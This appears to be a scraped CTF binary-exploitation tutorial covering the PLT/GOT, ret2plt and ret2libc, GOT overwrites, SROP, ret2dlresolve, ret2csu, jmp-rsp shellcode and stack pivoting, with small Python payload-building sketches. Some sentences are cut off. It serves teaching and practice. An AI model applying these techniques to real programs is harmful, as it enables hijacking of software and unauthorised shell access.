The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binaries in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc, the C standard library) to provide the bulk of the functionality.
For example, each ELF file will not carry its own version of puts compiled within it - it will instead dynamically link to the puts of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.
Not quite.
The problem with this approach is it requires libc to have a constant base address, i.e. be loaded in the same area of memory every time it's run, but remember that ASLR exists. Hence the need for dynamic linking. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.
The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.
When you call puts()
in C and compile it as an ELF executable, it is not actually puts()
- instead, it gets compiled as puts@plt
. Check it out in GDB:
Why does it do that?
Well, as we said, it doesn't know where puts
actually is - so it jumps to the PLT entry of puts
instead. From here, puts@plt
does some very specific things:
If there is a GOT entry for puts
, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.
The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc
functions. puts@got
, for example, will contain the address of puts
in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so
(also called the dynamic linker/loader) to get the function address and stores it in the GOT.
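The resolve-once-then-cache behaviour can be modelled with a toy Python class. This is only an illustration of the control flow described above, not how ld.so is implemented; ToyProcess, its fields and the numbers are invented for the example.

```python
class ToyProcess:
    """Toy model of lazy binding: the GOT is filled on the first PLT call."""

    def __init__(self, libc_base: int, libc_offsets: dict):
        self.libc_base = libc_base        # randomised by ASLR on each run
        self.libc_offsets = libc_offsets  # symbol -> offset inside libc
        self.got = {}                     # symbol -> resolved address
        self.resolver_calls = 0

    def _resolve(self, symbol: str) -> int:
        # Stands in for the dynamic linker looking the symbol up.
        self.resolver_calls += 1
        return self.libc_base + self.libc_offsets[symbol]

    def call_plt(self, symbol: str) -> int:
        # Empty GOT entry: resolve the symbol and store the result.
        if symbol not in self.got:
            self.got[symbol] = self._resolve(symbol)
        # Populated GOT entry: jump straight to the stored address.
        return self.got[symbol]


proc = ToyProcess(libc_base=0xf7db4000, libc_offsets={"puts": 0x67460})
first = proc.call_plt("puts")
second = proc.call_plt("puts")
print(hex(first), proc.resolver_calls)
```

After the first call, the address stored in the toy GOT is the real runtime address, which is exactly why reading a GOT entry leaks a libc address.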
Well, there are two key takeaways from the above explanation:
Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc
, and the GOT is within the binary.
The use of the first point is clear - if we have a PLT entry for a desirable libc
function, for example system
, we can just redirect execution to its PLT entry and it will be the equivalent of calling system
directly; no need to jump into libc
.
The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc
function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc
function and therefore bypass ASLR.
There are two main ways that I (personally) exploit an arbitrary read. Note that these approaches will cause not only the GOT entry to be returned but everything else until a null byte is reached as well, due to strings in C being null-terminated; make sure you only take the required number of bytes.
A ret2plt is a common technique that involves calling puts@plt
and passing the GOT entry of puts as a parameter. This causes puts
to print out its own address in libc
. You then set the return address to the function you are exploiting in order to call it again and enable you to
flat()
packs all the values you give it with p32()
and p64()
(depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time
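To make the packing concrete, here is a standard-library sketch of what such helpers do. The functions are simplified stand-ins named after the pwntools ones, not the pwntools implementation, and every address in the payload is hypothetical.

```python
import struct


def p32(value: int) -> bytes:
    """Pack an integer as 4 little-endian bytes."""
    return struct.pack("<I", value)


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)


def flat(*items, word_size: int = 32) -> bytes:
    """Concatenate items, packing integers and passing bytes through."""
    pack = p32 if word_size == 32 else p64
    return b"".join(i if isinstance(i, bytes) else pack(i) for i in items)


# 32-bit ret2plt layout: padding, puts@plt, return address, puts@got.
payload = flat(
    b"A" * 32,     # hypothetical padding up to the saved return pointer
    0x08049030,    # hypothetical puts@plt
    0x080491b6,    # hypothetical address of the function to return into
    0x0804c010,    # hypothetical puts@got, the argument to puts
)
print(payload.hex())
```

In 32-bit code the word after the called function's address is its return address and the word after that is its first argument, which is why the GOT entry comes last.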
This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way to complicate future payloads, for example when stack pivoting.
The PLT and GOT do the bulk of dynamic linking
The PLT resolves actual locations in libc
of functions you use and stores them in the GOT
Next time that function is called, it jumps to the GOT and resumes execution there
Calling function@plt
is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating libc
base
This time around, there's no leak. You'll have to use the ret2plt technique explained previously. Feel free to have a go before looking further on.
We're going to have to leak ASLR base somehow, and the only logical way is a ret2plt. We're not struggling for space as gets()
takes in as much data as we want.
All the basic setup
Now we want to send a payload that leaks the real address of puts
. As mentioned before, calling the PLT entry of a function is the same as calling the function itself; if we point the parameter to the GOT entry, it'll print out its actual location. This is because, in C, string arguments for functions are actually pointers to where the string can be found, so pointing it to the GOT entry (which we know the location of) will print it out.
But why is there a main
there? Well, if we set the return address to random jargon, we'll leak libc base but then it'll crash; if we call main
again, however, we essentially restart the binary - except we now know libc
base so this time around we can do a ret2libc.
Remember that the GOT entry won't be the only thing printed - puts
, and most functions in C, print until a null byte. This means it will keep on printing GOT addresses, but the only one we care about is the first one, so we grab the first 4 bytes and use u32()
to interpret them as a little-endian number. After that we ignore the rest of the values as well as the Come get me
from calling main
again.
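The parsing step can be sketched with the standard library alone. The received bytes below are fabricated to resemble what puts might print; struct.unpack with "<I" does the same job as u32().

```python
import struct


def parse_puts_leak(received: bytes) -> int:
    """Interpret the first 4 bytes of the output as a little-endian address."""
    if len(received) < 4:
        raise ValueError("leak was cut short, probably by an early null byte")
    return struct.unpack("<I", received[:4])[0]


# Fabricated output: the puts GOT entry, a neighbouring GOT entry that puts
# also printed, then the banner from the second run of main.
sample = bytes.fromhex("60b4e1f7") + bytes.fromhex("d0c3e2f7") + b"\nCome get me\n"

puts_leak = parse_puts_leak(sample)
print(hex(puts_leak))
```

Only the first word is trusted; everything after it is discarded before sending the second-stage payload.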
From here, we simply calculate libc base again and perform a basic ret2libc:
And bingo, we have a shell!
You know the drill - try the same thing for 64-bit. If you want, you can use pwntools' ROP capabilities - or, to make sure you understand calling conventions, be daring and do both :P
The very simplest of possible GOT-overwrite binaries.
Infinite loop which takes in your input and prints it out to you using printf
- no buffer overflow, just format string. Let's assume ASLR is disabled - have a go yourself :)
As per usual, set it all up
Now, to do the %n
overwrite, we need to find the offset until we start reading the buffer.
Looks like it's the 5th.
Yes it is!
Now, next time printf
gets called on your input it'll actually be system
!
If the buffer is restrictive, you can always send /bin/sh
to get you into a shell and run longer commands.
You'll never guess. That's right! You can do this one by yourself.
If you want an additional challenge, re-enable ASLR and do the 32-bit and 64-bit exploits again; you'll have to leverage what we've covered previously.
Just as we did for PIE, except this time we print the address of system.
Yup, does what we expected.
Your address of system might end in different characters - you just have a different libc version
Much of this is as we did with PIE.
Note that we include the libc here - this is just another ELF
object that makes our lives easier.
Parse the address of system and calculate libc base from that (as we did with PIE):
Now we can finally ret2libc, using the libc
ELF
object to really simplify it for us:
Try it yourself :)
If you prefer, you could have changed the following payload to be more pwntoolsy:
Instead, you could do:
The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.
Shellcode, but without the guesswork
The problem with shellcode exploits as they are is that the location of the shellcode is uncertain - wouldn't it be cool if we could control where we wrote it to?
Well, we can.
Instead of writing shellcode directly, we can instead use some ROP to take in input again - except this time, we specify the location as somewhere we control.
If you think about it, once the return pointer is popped off the stack ESP will point at whatever is after it in memory - after all, that's the entire basis of ROP. But what if we put shellcode there?
It's a crazy idea. But remember, ESP will point there. So what if we overwrite the return pointer with a jmp esp
gadget! Once it gets popped off, ESP will point at the shellcode and thanks to the jmp esp
it will be executed!
ret2reg extends the use of jmp esp
to the use of any register that happens to point somewhere you need it to.
Relocation Read-Only
RELRO is a protection to stop any GOT overwrites from taking place, and it does so very effectively. There are two types of RELRO, which are both easy to understand.
Partial RELRO simply moves the GOT above the program's variables, meaning you can't overflow into the GOT. This, of course, does not prevent format string overwrites.
Full RELRO makes the GOT completely read-only, so even format string exploits cannot overwrite it. This is not the default in binaries because it can make the binary take much longer to load, as it needs to resolve all the function addresses at once.
Interfacing directly with the kernel
A syscall is a system call, and is how the program enters the kernel in order to carry out specific tasks such as creating processes, I/O and anything else that requires kernel-level access.
Browsing the list of syscalls, you may notice that certain syscalls are similar to libc functions such as open()
, fork()
or read()
; this is because these functions are simply wrappers around the syscalls, making it much easier for the programmer.
On 64-bit Linux, a syscall is triggered by the syscall instruction (32-bit x86 uses int 0x80 instead). Once it's called, the kernel checks the value stored in RAX - this is the syscall number, which defines what syscall gets run. As per the table, the other parameters can be stored in RDI, RSI, RDX, etc and every parameter has a different meaning for the different syscalls.
A notable syscall is the execve
syscall, which executes the program passed to it in RDI. RSI and RDX hold argv
and envp
respectively.
This means, if there is no system()
function, we can use execve
to call /bin/sh
instead - all we have to do is pass in a pointer to /bin/sh
to RDI, and populate RSI and RDX with 0
(this is because both argv
and envp
need to be NULL
to pop a shell).
Controlling all registers at once
A sigreturn is a special type of syscall. The purpose of sigreturn is to return from the signal handler and to clean up the stack frame after a signal has been unblocked.
What this involves is storing all the register values on the stack. Once the signal is unblocked, all the values are popped back in (RSP points to the bottom of the sigreturn frame, this collection of register values).
By leveraging a sigreturn
, we can control all register values at once - amazing! Yet this is also a drawback - we can't pick-and-choose registers, so if we don't have a stack leak it'll be hard to set registers like RSP to a workable value. Nevertheless, this is a super powerful technique - especially with limited gadgets.
Quick shells and pointers
A one_gadget
is simply an execve("/bin/sh")
command that is present in glibc, and this can be a quick win with GOT overwrites - next time the function is called, the one_gadget
is executed and the shell is popped.
__malloc_hook
is a feature of glibc. The official GNU site defines __malloc_hook
as:
The value of this variable is a pointer to the function that
malloc
uses whenever it is called.
To summarise, when you call malloc()
the function __malloc_hook
points to also gets called - so if we can overwrite this with, say, a one_gadget
, and somehow trigger a call to malloc()
, we can get an easy shell.
Luckily there is a tool written in Ruby called one_gadget
. To install it, run:
And then you can simply run
For most one_gadgets, certain criteria have to be met. This means they won't all work - in fact, none of them may work.
Wait a sec - isn't malloc()
a heap function? How will we use it on the stack? Well, you can actually trigger malloc
by calling printf("%10000$c")
(this allocates too many bytes for the stack, forcing libc to allocate the space on the heap instead). So, if you have a format string vulnerability, calling malloc is trivial.
This is a hard technique to give you practise on, due to the fact that your libc
version may not even have working one_gadgets
. As such, feel free to play around with the GOT overwrite binary and see if you can get a one_gadget
working.
Remember, the value given by the one_gadget
tool needs to be added to libc base as it's just an offset.
Any function that returns a pointer to the string once it acts on it is a prime target. There are many that do this, including stuff like gets()
, strcpy()
and fgets()
. We'll keep it simple and use gets()
as an example.
First, let's make sure that some register does point to the buffer:
Now we'll set a breakpoint on the ret
in vuln()
, continue and enter text.
We've hit the breakpoint, so let's check if RAX points to our buffer. We'll assume RAX first because that's the traditional register to use for the return value.
And indeed it does!
We now just need a jmp rax
gadget or equivalent. I'll use ROPgadget for this and look for either jmp rax
or call rax
:
There's a jmp rax
at 0x40109c
, so I'll use that. The padding up until RIP is 120
; I assume you can calculate this yourselves by now, so I won't bother showing it.
Awesome!
Super standard binary.
Let's get all the basic setup done.
Now we're going to do something interesting - we are going to call gets
again. Most importantly, we will tell gets
to write the data it receives to a section of the binary. We need somewhere both readable and writeable, so I choose the GOT. We pass a GOT entry to gets
, and when it receives the shellcode we send it will write the shellcode into the GOT. Now we know exactly where the shellcode is. To top it all off, we set the return address of our call to gets
to where we wrote the shellcode, perfectly executing what we just inputted.
I wonder what you could do with this.
No need to worry about ASLR! Neither the stack nor libc is used, save for the ROP.
The real problem would be if PIE was enabled, as then you couldn't call gets
as the location of the PLT would be unknown without a leak - same problem with writing to the GOT.
Thanks to clubby789 and Faith from the HackTheBox Discord server, I found out that the GOT often has Executable permissions simply because that's the default permissions when there's no NX. If you have a more recent kernel, such as 5.9.0
, the default is changed and the GOT will not have X permissions.
As such, if your exploit is failing, run uname -r
to grab the kernel version and check if it's 5.9.0
; if it is, you'll have to find another RWX region to place your shellcode (if it exists!).
You can ignore most of it as it's mostly there to accommodate the existence of jmp rsp
- we don't actually want it called, so there's a negative if
statement.
The chances of jmp rsp gadgets existing in the binary are incredibly low, but what you often do instead is find a sequence of bytes that encodes jmp rsp and jump there - jmp rsp is \xff\xe4 in machine code, so if any part of the executable section contains bytes in this order, they can be used as if they are a jmp rsp.
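A short sketch of that byte search in plain Python. The section contents and load address are invented for the example; with a real binary you would read the executable section's bytes from the file instead.

```python
JMP_RSP = b"\xff\xe4"  # machine-code encoding of jmp rsp


def find_all(blob: bytes, needle: bytes) -> list:
    """Return every offset at which needle occurs in blob."""
    hits = []
    start = blob.find(needle)
    while start != -1:
        hits.append(start)
        start = blob.find(needle, start + 1)
    return hits


# Made-up executable bytes. The second hit sits inside the immediate of
# `mov eax, 0xe4ff` (b8 ff e4 00 00), so it is not an intended instruction.
text_section = bytes.fromhex("4889e5ffe4c3b8ffe40000")
text_base = 0x401000  # hypothetical load address of the section

gadgets = [text_base + off for off in find_all(text_section, JMP_RSP)]
print([hex(g) for g in gadgets])
```

The search ignores instruction boundaries on purpose: the CPU decodes from wherever RIP lands, so bytes in the middle of another instruction work just as well.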
Try to do this yourself first, using the explanation on the previous page. Remember, RSP points at the thing after the return pointer once ret
has occurred, so your shellcode goes after it.
You won't always have enough overflow - perhaps you'll only have 7 or 8 bytes. What you can do in this scenario is make the shellcode after the RIP equivalent to something like
Where 0x20
is the offset between the current value of RSP and the start of the buffer. In the buffer itself, we put the main shellcode. Let's try that!
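The stub itself is not reproduced in the text, so the following is an assumption about its shape: a sub rsp, <offset> followed by jmp rsp, assembled by hand so the byte count is visible. The helper name pivot_stub is hypothetical.

```python
import struct


def pivot_stub(offset: int) -> bytes:
    """Assemble `sub rsp, offset; jmp rsp` for x86-64 by hand."""
    if 0 <= offset <= 0x7f:
        # 48 83 ec ib : sub rsp, imm8 (the immediate is sign-extended)
        sub_rsp = b"\x48\x83\xec" + bytes([offset])
    elif offset <= 0x7fffffff:
        # 48 81 ec id : sub rsp, imm32, needed once the offset exceeds 0x7f
        sub_rsp = b"\x48\x81\xec" + struct.pack("<i", offset)
    else:
        raise ValueError("offset out of range")
    return sub_rsp + b"\xff\xe4"  # ff e4 : jmp rsp


small = pivot_stub(0x20)
large = pivot_stub(128)
print(small.hex(), len(small))
print(large.hex(), len(large))
```

With an offset of 0x20 the stub is 6 bytes, which fits in the 7 or 8 bytes of overflow mentioned above. An offset of 128 no longer fits in a signed 8-bit immediate, so the longer encoding makes the stub 9 bytes.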
The 10
is just a placeholder. Once we hit the pause()
, we attach with radare2 and set a breakpoint on the ret
, then continue. Once we hit it, we find the beginning of the A
string and work out the offset between that and the current value of RSP - it's 128
!
We successfully pivoted back to our shellcode - and because all our addresses are relative, it's completely reliable! ASLR beaten with pure shellcode.
This is harder with PIE as the location of jmp rsp
will change, so you might have to leak PIE base!
Resolving our own libc functions
During a ret2dlresolve, the attacker tricks the binary into resolving a function of its choice (such as system
) into the PLT. This then means the attacker can use the PLT function as if it was originally part of the binary, bypassing ASLR (if present) and requiring no libc leaks.
Dynamically-linked ELF objects import libc
functions when they are first called using the PLT and GOT. During the relocation of a runtime symbol, RIP will jump to the PLT and attempt to resolve the symbol. During this process a "resolver" is called.
For all these screenshots, I broke at read@plt
. I'm using GDB with the pwndbg
plugin as it shows it a bit better.
The PLT jumps to wherever the GOT points. Originally, before the GOT is updated, it points back to the instruction after the jmp
in the PLT to resolve it.
In order to resolve the functions, there are 3 structures that need to exist within the binary. Faking these 3 structures could enable us to trick the linker into resolving a function of our choice, and we can also pass parameters in (such as /bin/sh
) once resolved.
There are 3 structures we need to fake.
The JMPREL
segment (.rel.plt
) stores the Relocation Table, which maps each entry to a symbol.
These entries are of type Elf32_Rel
:
The column name
corresponds to our symbol name. The offset
is the GOT entry for our symbol. info
stores additional metadata.
Note that, due to this, the R_SYM
of gets
is 1
as 0x107 >> 8 = 1
.
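A small sketch of how an Elf32_Rel entry splits into its parts. The layout (two 32-bit words, r_offset then r_info) follows the ELF specification; the GOT address used in the sample entry is hypothetical.

```python
import struct

R_386_JMP_SLOT = 7  # relocation type used for PLT/GOT function slots on i386


def parse_elf32_rel(raw: bytes) -> dict:
    """Decode one 8-byte Elf32_Rel entry."""
    r_offset, r_info = struct.unpack("<II", raw)
    return {
        "r_offset": r_offset,      # where the resolved address is written
        "r_info": r_info,
        "r_sym": r_info >> 8,      # index into SYMTAB
        "r_type": r_info & 0xff,   # relocation type
    }


# Sample entry with the info value 0x107 from the text.
entry = struct.pack("<II", 0x0804c00c, 0x107)
rel = parse_elf32_rel(entry)
print(rel)
```

The low byte of info is the relocation type and the remaining bits are the symbol index, which is why shifting right by 8 gives 1 here.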
Much simpler - just a table of strings for the names.
Symbol information is stored here in an Elf32_Sym
struct:
The most important value here is st_name
as this gives the offset in STRTAB of the symbol name. The other fields are not relevant to the exploit itself.
We now know we can get the STRTAB
offset of the symbol's string using the R_SYM
value we got from the JMPREL
, combined with SYMTAB
:
Here we're reading SYMTAB + R_SYM * size (16)
, and it appears that the offset (the SYMTAB
st_name
variable) is 0x10
.
And if we read that offset on STRTAB
, we get the symbol's name!
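The whole lookup chain (R_SYM, then SYMTAB, then STRTAB) can be rehearsed on synthetic tables. The tables below are hand-built so that the name lands at offset 0x10 as in the text; they are not dumped from the real binary.

```python
import struct

SYM_SIZE = 16  # sizeof(Elf32_Sym)


def make_sym(st_name: int, st_info: int = 0x12) -> bytes:
    """Build an Elf32_Sym: name, value, size, info, other, shndx."""
    return struct.pack("<IIIBBH", st_name, 0, 0, st_info, 0, 0)


def symbol_name(symtab: bytes, strtab: bytes, r_sym: int) -> str:
    """Follow SYMTAB[r_sym].st_name into STRTAB and read the C string."""
    (st_name,) = struct.unpack_from("<I", symtab, r_sym * SYM_SIZE)
    end = strtab.index(b"\x00", st_name)
    return strtab[st_name:end].decode()


# Synthetic string table: "gets" starts at offset 0x10.
strtab = b"\x00libc.so.6\x00read\x00gets\x00"
# Synthetic symbol table: entry 0 is the reserved null symbol.
symtab = make_sym(0, st_info=0) + make_sym(0x10)

r_sym = 0x107 >> 8
print(symbol_name(symtab, strtab, r_sym))
```

A ret2dlresolve forges exactly these three pieces so that the final string read is the name of a function of the attacker's choosing.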
Let's hop back to the GOT and PLT for a slightly more in-depth look.
If the GOT entry is unpopulated, we push the reloc_offset
value and jump to the beginning of the .plt
section. A few instructions later, the dl-resolve()
function is called, with reloc_offset
being one of the arguments. It then uses this reloc_offset
to calculate the relocation and symtab entries.
To make it super simple, I made it in assembly using pwntools:
The binary contains all the gadgets you need! First it executes a read
syscall, writes to the stack, then the ret
occurs and you can gain control.
But what about the /bin/sh
? I slightly cheesed this one and couldn't be bothered to add it to the assembly, so I just did:
As we mentioned before, we need the following layout in the registers:
To get the address of the gadgets, I'll just do objdump -d vuln
. The address of /bin/sh
can be gotten using strings:
The offset from the base to the string is 0x1250
(-t x
tells strings
to print the offset as hex). Armed with all this information, we can set up the constants:
Now we just need to populate the registers. I'll tell you the padding is 8
to save time:
And wehey - we get a shell!
File Descriptors and Sockets
File Descriptors are integers that represent connections to sockets or files or whatever you're connecting to. In Unix systems, there are 3
main file descriptors (often abbreviated fd) for each application:
These are, as shown above, standard input, output and error. You've probably used them before yourself, for example to hide errors when running commands:
Here you're piping stderr
to /dev/null
, which is the same principle.
Many binaries in CTFs use programs such as socat
to redirect stdin
and stdout
(and sometimes stderr
) to the user when they connect. These are super simple and often require no more than a replacement of
With the line
Others, however, implement their own socket programming in C. In these scenarios, stdin
and stdout
may not be shown back to the user.
The reason for this is every new connection has a different fd. If you listen in C, since fd 0-2 is reserved, the listening socket will often be assigned fd 3
. Once we connect, we set up another fd, fd 4
(neither the 3
nor the 4
is certain, but statistically likely).
In these scenarios, it's just as simple to pop a shell. This shell, however, is not shown back to the user - it's shown back to the terminal running the server. Why? Because it utilises fd 0
, 1
and 2
for its I/O.
Here we have to tell the program to duplicate the file descriptor in order to redirect stdin
and stdout
to fd 4
, and glibc provides a simple way to do so.
The dup
syscall (and C function) duplicates the fd and uses the lowest-numbered free fd. However, we need to ensure it's fd 4
that's used, so we can use dup2()
. dup2
takes in two parameters: a newfd
and an oldfd
. Descriptor oldfd
is duplicated to newfd
, allowing us to interact with stdin
and stdout
and actually use any shell we may have popped.
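The effect of dup2 can be observed safely from Python, whose os.dup2(fd, fd2) wraps the same call. In this sketch two pipes stand in for the server's terminal and the client's socket, and an ordinary descriptor plays the role of stdout so the real fd 0-2 are left alone.

```python
import os

term_r, term_w = os.pipe()   # stand-in for the server's terminal
sock_r, sock_w = os.pipe()   # stand-in for the client connection (e.g. fd 4)

out_fd = os.dup(term_w)      # plays the role of stdout; currently the "terminal"

# Duplicate the "socket" onto out_fd. The descriptor previously at out_fd is
# closed silently, and out_fd now refers to the socket stand-in.
os.dup2(sock_w, out_fd)

os.write(out_fd, b"shell output")
data = os.read(sock_r, 64)   # the "client" side sees the output
print(data)

for fd in (term_r, term_w, sock_r, sock_w, out_fd):
    os.close(fd)
```

In an exploit the same idea is applied with the connection's descriptor as the source and 0 and 1 (and optionally 2) as the targets, before the shell is spawned.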
Obviously, you can do a ret2plt followed by a ret2libc, but that's really not the point of this. Try calling win()
, and to do that you have to populate the register rdx
. Try what we've talked about, and then have a look at the answer if you get stuck.
We can work out the addresses of the massive chains using r2, and chuck this all into pwntools.
Note I'm not popping RBX, despite the call
. This is because RBX ends up being 0
anyway, and you want to touch as few registers as possible to ensure the best success.
Now we need to find a memory location that has the address of win()
written into it so that we can point r15
at it. I'm going to opt to call gets()
again instead, and then input the address. The location we input to is a fixed location of our choice, which is reliable. Now we just need to find a location.
To do this, I'll run r2 on the binary then dcu main
to continue until main. Now let's check permissions:
The third location is RW, so let's check it out.
The address 0x404028
appears unused, so I'll write win()
there.
To do this, I'll just use the ROP class.
Now we have the address written there, let's just get the massive ropchain and plonk it all in
Don't forget to pass a parameter to the gets()
:
And we have successfully controlled RDX - without any RDX gadgets!
As you probably noticed, we don't need to pop off r12 or r13, so we can move POP_CHAIN
a couple of instructions along:
As of glibc 2.34, the CSU has been hardened to remove the useful gadgets. The patch responsible essentially removes __libc_csu_init
(as well as a couple other functions) entirely.
Unfortunately, changing this breaks the ABI (application binary interface), meaning that any binaries compiled in this way cannot run on pre-2.34 glibc versions - which can make things quite annoying for CTF challenges if you have an outdated glibc version. Older compilations, however, can work on the newer versions.
As with the , I made the binary using the pwntools ELF features:
It's quite simple - a read
syscall, followed by a pop rax; ret
gadget. You can't control RDI/RSI/RDX, which you need to pop a shell, so you'll have to use SROP.
Once again, I added /bin/sh
to the binary:
First let's plonk down the available gadgets and their location, as well as the location of /bin/sh
.
From here, I suggest you try the payload yourself. The padding (as you can see in the assembly) is 8
bytes until RIP, then you'll need to trigger a sigreturn
, followed by the values of the registers.
The triggering of a sigreturn
is easy - sigreturn is syscall 0xf
(15
), so we just pop that into RAX and call syscall
:
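A minimal sketch of that trigger using only the standard library. Both gadget addresses are hypothetical placeholders; the real ones come from disassembling the binary.

```python
import struct

POP_RAX = 0x41018         # hypothetical address of the `pop rax; ret` gadget
SYSCALL = 0x41015         # hypothetical address of the `syscall` instruction
SYS_RT_SIGRETURN = 0xf    # sigreturn syscall number on x86-64


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes (stand-in for pwntools p64)."""
    return struct.pack("<Q", value)


trigger = b"A" * 8                 # padding up to the saved RIP
trigger += p64(POP_RAX)            # return into pop rax; ret
trigger += p64(SYS_RT_SIGRETURN)   # value popped into RAX
trigger += p64(SYSCALL)            # ret lands on syscall with RAX = 15
print(trigger.hex())
```

Whatever follows these 32 bytes is what the kernel will interpret as the saved register frame.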
Now the syscall looks at the location of RSP for the register values; we'll have to fake them. They have to be in a specific order, but luckily for us pwntools has a cool feature called a SigreturnFrame()
that handles the order for us.
Now we just need to decide what the register values should be. We want to trigger an execve()
syscall, so we'll set the registers to the values we need for that:
However, in order to trigger this we also have to control RIP and point it back at the syscall
gadget, so the execve actually executes:
We then append it to the payload and send.
Controlling registers when gadgets are lacking
ret2csu is a technique for populating registers when there is a lack of gadgets. More information can be found in the , but a summary is as follows:
When an application is dynamically linked (linked against libc at runtime), there is a selection of functions it contains to allow the linking. These functions contain within them a selection of gadgets that we can use to populate registers we lack gadgets for, most importantly __libc_csu_init
, which contains the following two gadgets:
The second might not look like a gadget, but if you look it calls r15 + rbx*8
. The first gadget chain allows us to control both r15
and rbx
in that series of huge pop
operations, meaning we can control where the second gadget calls afterwards.
Note it's call qword [r15 + rbx*8]
, not call qword r15 + rbx*8
. This means it'll calculate r15 + rbx*8
then go to that memory address, read it, and call that value. This means we have to find a memory address that contains where we want to jump.
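The extra level of indirection is easy to get wrong, so here is a toy model of it. Memory is a plain dictionary, and both the slot address and the target address are hypothetical.

```python
def csu_call_target(r15: int, rbx: int, memory: dict) -> int:
    """Model `call qword [r15 + rbx*8]`: compute the slot, then dereference it."""
    slot = r15 + rbx * 8
    return memory[slot]   # the CPU jumps to the value stored AT the slot


WIN = 0x401156             # hypothetical address of the function to reach
memory = {0x404028: WIN}   # a writable slot that holds a pointer to it

# Pointing r15 at the slot (with rbx = 0) reaches the function...
print(hex(csu_call_target(0x404028, 0, memory)))
# ...and so does any r15/rbx pair that computes the same slot.
print(hex(csu_call_target(0x404018, 2, memory)))
```

Putting the function's own address in r15 would not work: the gadget would read whatever bytes sit at that address and try to call them as a pointer.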
These gadget chains allow us, despite an apparent lack of gadgets, to populate the RDX and RSI registers (which are important for parameters) via the second gadget, then jump wherever we wish by simply controlling r15
and rbx
to workable values.
This means we can potentially pull off syscalls for execve
, or populate parameters for functions such as write()
.
You may wonder why we would do something like this if we're linked to libc - why not just read the GOT? Well, some functions - such as write()
- require three parameters (and at least 2), so we would require ret2csu to populate them if there was a lack of gadgets.
Note that the outlines how if newfd
is in use it is silently closed, which is exactly what we wish.
Name    fd
stdin   0
stdout  1
stderr  2
Lack of space for ROP
Stack Pivoting is a technique we use when we lack space on the stack - for example, we have 16 bytes past RIP. In this scenario, we're not able to complete a full ROP chain.
During Stack Pivoting, we take control of the RSP register and "fake" the location of the stack. There are a few ways to do this.
Possibly the simplest, but also the least likely to exist. If there is one of these, you're quite lucky.
If you can find a pop <reg>
gadget, you can then use this xchg
gadget to swap the values with the ones in RSP. Requires about 16 bytes of stack space after the saved return pointer: